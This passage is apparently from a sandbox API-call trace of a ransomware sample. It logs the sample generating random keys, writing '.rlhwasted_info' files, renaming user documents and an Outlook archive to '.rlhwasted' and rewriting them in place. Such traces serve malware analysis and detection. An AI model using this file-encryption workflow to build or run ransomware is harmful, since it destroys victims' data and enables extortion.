"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nkoce-puvsik.odt.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0190.933] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0190.933] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x14f9e [0190.934] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14f9e) returned 0xb00000 [0190.934] CloseHandle (hObject=0x124) returned 1 [0190.947] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0190.948] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0190.948] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.948] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0190.949] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0190.949] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.972] SetEndOfFile (hFile=0x110) returned 1 [0190.974] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.974] CloseHandle (hObject=0x110) returned 1 [0191.024] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0191.024] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f90c8 | out: hHeap=0x6b0000) returned 1 [0191.024] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0191.025] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0191.025] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nx_FGvzbjJb.pptx") returned 60 [0191.025] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x282) returned 0x6d4580 [0191.026] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0191.026] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0191.026] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0191.027] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0191.027] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nx_FGvzbjJb.pptx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nx_fgvzbjjb.pptx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0191.028] WriteFile (in: hFile=0x110, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0191.029] SetEndOfFile (hFile=0x110) returned 1 [0191.029] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.029] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0191.029] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0191.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nx_FGvzbjJb.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nx_fgvzbjjb.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nx_FGvzbjJb.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nx_fgvzbjjb.pptx.rlhwasted")) returned 1 [0191.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nx_FGvzbjJb.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nx_fgvzbjjb.pptx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0191.121] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0191.122] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x13634 [0191.122] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13634) returned 0xb00000 [0191.122] CloseHandle (hObject=0x10c) returned 1 [0191.131] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0191.132] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0191.132] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.132] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0191.133] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0191.133] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.172] SetEndOfFile (hFile=0x110) returned 1 [0191.330] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.331] CloseHandle (hObject=0x110) returned 1 [0191.341] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0191.341] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f91a0 | out: hHeap=0x6b0000) returned 1 [0191.341] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0191.342] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0191.342] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0191.342] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0191.342] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0191.342] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0191.342] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0191.406] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0191.406] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0191.407] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0191.409] SetEndOfFile (hFile=0x124) returned 1 [0191.409] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.409] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.409] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0191.409] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.rlhwasted")) returned 1 [0191.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0191.411] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0191.411] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x42400 [0191.411] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x42400) returned 0x12b0000 [0191.411] CloseHandle (hObject=0x110) returned 1 [0191.498] UnmapViewOfFile (lpBaseAddress=0x12b0000) returned 1 [0191.501] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0191.502] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0191.502] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.502] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0191.503] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0191.503] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.517] SetEndOfFile (hFile=0x124) returned 1 [0191.521] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0191.521] CloseHandle (hObject=0x124) returned 1 [0191.529] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0191.529] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x700468 | out: hHeap=0x6b0000) returned 1 [0191.529] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0191.562] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0191.562] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.562] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PxJwY446BG33M0Cd.xlsx") returned 65 [0191.562] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28c) returned 0x6ee458 [0191.563] lstrcpyW (in: lpString1=0x6ee4da, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0191.563] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0191.563] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0191.564] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0191.564] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PxJwY446BG33M0Cd.xlsx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pxjwy446bg33m0cd.xlsx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0191.565] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0191.566] SetEndOfFile (hFile=0x124) returned 1 [0191.566] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.566] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.566] lstrcpyW (in: lpString1=0x6ee4da, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0191.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PxJwY446BG33M0Cd.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pxjwy446bg33m0cd.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PxJwY446BG33M0Cd.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pxjwy446bg33m0cd.xlsx.rlhwasted")) returned 1 [0191.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PxJwY446BG33M0Cd.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pxjwy446bg33m0cd.xlsx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0191.568] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0191.568] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x6f69 [0191.568] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f69) returned 0x6a0000 [0191.568] CloseHandle (hObject=0x110) returned 1 [0191.572] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0191.572] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0191.573] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0191.573] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.573] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0191.574] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0191.574] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.585] SetEndOfFile (hFile=0x124) returned 1 [0191.588] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.588] CloseHandle (hObject=0x124) returned 1 [0191.651] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0191.651] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd630 | out: hHeap=0x6b0000) returned 1 [0191.651] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0191.652] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0191.652] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0191.652] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QBTspVh.docx") returned 56 [0191.652] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27a) returned 0x6fd458 [0191.652] lstrcpyW (in: lpString1=0x6fd4c8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0191.652] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0191.652] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0191.653] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0191.653] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QBTspVh.docx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbtspvh.docx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0191.654] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0191.656] SetEndOfFile (hFile=0x124) returned 1 [0191.656] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.656] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.656] lstrcpyW (in: lpString1=0x6fd4c8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0191.656] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QBTspVh.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbtspvh.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QBTspVh.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbtspvh.docx.rlhwasted")) returned 1 [0191.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QBTspVh.docx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbtspvh.docx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0191.657] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0191.658] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x172db [0191.658] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x172db) returned 0xb00000 [0191.658] CloseHandle (hObject=0x110) returned 1 [0191.668] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0191.668] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0191.669] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0191.670] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.670] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0191.671] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0191.671] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0191.682] SetEndOfFile (hFile=0x124) returned 1 [0191.685] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0191.685] CloseHandle (hObject=0x124) returned 1 [0192.000] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0192.000] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd710 | out: hHeap=0x6b0000) returned 1 [0192.000] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0192.001] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0192.002] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.002] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qYp3dKW1.xlsx") returned 57 [0192.002] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x27c) returned 0x6fd458 [0192.002] lstrcpyW (in: lpString1=0x6fd4ca, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.002] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0192.002] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0192.003] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0192.003] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qYp3dKW1.xlsx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qyp3dkw1.xlsx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0192.208] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0192.224] SetEndOfFile (hFile=0x124) returned 1 [0192.225] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.225] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.225] lstrcpyW (in: lpString1=0x6fd4ca, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.225] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qYp3dKW1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qyp3dkw1.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qYp3dKW1.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qyp3dkw1.xlsx.rlhwasted")) returned 1 [0192.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qYp3dKW1.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qyp3dkw1.xlsx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0192.227] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0192.227] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x18527 [0192.227] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18527) returned 0xb00000 [0192.227] CloseHandle (hObject=0x128) returned 1 [0192.236] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0192.237] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0192.238] CryptGenRandom (in: hProv=0x6f4f10, 